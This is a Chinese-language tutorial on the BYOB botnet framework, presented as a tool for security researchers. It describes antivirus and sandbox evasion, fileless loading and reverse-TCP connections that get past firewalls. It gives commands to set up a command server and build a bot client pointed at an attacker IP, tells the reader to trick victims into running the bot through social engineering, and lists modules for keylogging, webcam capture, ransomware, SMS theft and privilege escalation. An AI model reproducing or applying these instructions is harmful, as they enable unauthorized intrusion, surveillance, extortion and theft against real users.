BYOB为安全研究人员和开发人员提供了一个框架,以构建和操作基本的僵尸网络,以加深他们对每年感染数百万个设备并产生现代僵尸网络的复杂恶意软件的了解,从而提高他们针对这些威胁制定对策的能力。 。它旨在使开发人员可以轻松实现自己的代码并添加出色的新功能,而无需从头开始编写RAT或Command&Control服务器。
什么都不写到磁盘-客户端从不向磁盘写入任何内容-甚至不向临时文件写入任何内容,因为远程导入允许将任意代码动态加载到内存中并直接导入当前正在运行的进程。
与平台无关-一切均以Python编写,并且生成的客户端可以选择编译为可移植的可执行文件(Windows)或捆绑为独立的应用程序。
绕过防火墙-客户端通过反向TCP连接连接到命令和控制服务器,这将绕过大多数防火墙,因为默认过滤器配置主要阻止传入连接。
对抗防病毒措施–通过阻止生成带有已知防病毒产品名称的进程来避免被防病毒分析。
加密有效载荷以防止分析-主客户端有效载荷使用随机的256位键加密,该键仅在与其一起生成的有效载荷分级器中存在。
防止进行逆向工程-默认情况下,如果检测到虚拟机或沙箱,客户端将中止执行。
git clone https://github.com/malwaredllc/byob.git
cd byob
点安装-r requirements.txt
python setup.py
这里将使用两个终端。第一个终端是将要处理会话的Bot Server,第二个终端是将要创建机器人的Bot Client。
python server.py –端口445
然后打开另一个Linux终端,然后键入cd / home / cybersecurity / Downloads / byob / byob
python client.py –名称testbot.py 192.168.1.10(攻击者IP)445
执行以上查询后,将创建一个新的僵尸网络。上面的查询将执行。现在,您可以使用任何社交工程技巧,任何人都可以在其计算机上打开bot。在目标计算机上执行testbot.py时,将在僵尸网络服务器中创建一个会话。
漏洞利用后的模块可以在受害者成功配置僵尸网络后由客户端远程导入。
按键记录程序(byob.modules.keylogger):记录用户的按键和输入的窗口名称
屏幕截图(byob.modules.screenshot):拍摄当前用户桌面的屏幕截图
网络摄像头(byob.modules.webcam):查看实时流或从网络摄像头捕获图像/视频
赎金(byob.modules.ransom):加密文件并生成随机的BTC钱包进行赎金支付
数据包嗅探器(byob.modules.packetsniffer):在主机网络上运行数据包嗅探器并上传.pcap文件
持久性(byob.modules.persistence):在主机上建立持久性
电话(byob.modules.phone):从客户端智能手机读取/搜索/上传短信
升级权限(byob.modules.escalate):尝试绕过UAC获得未经授权的管理员权限
端口扫描程序(byob.modules.portscanner):扫描本地网络以查找其他联机设备和打开的端口
进程控制(byob.modules.process):列出/搜索/杀死/监视主机上当前正在运行的进程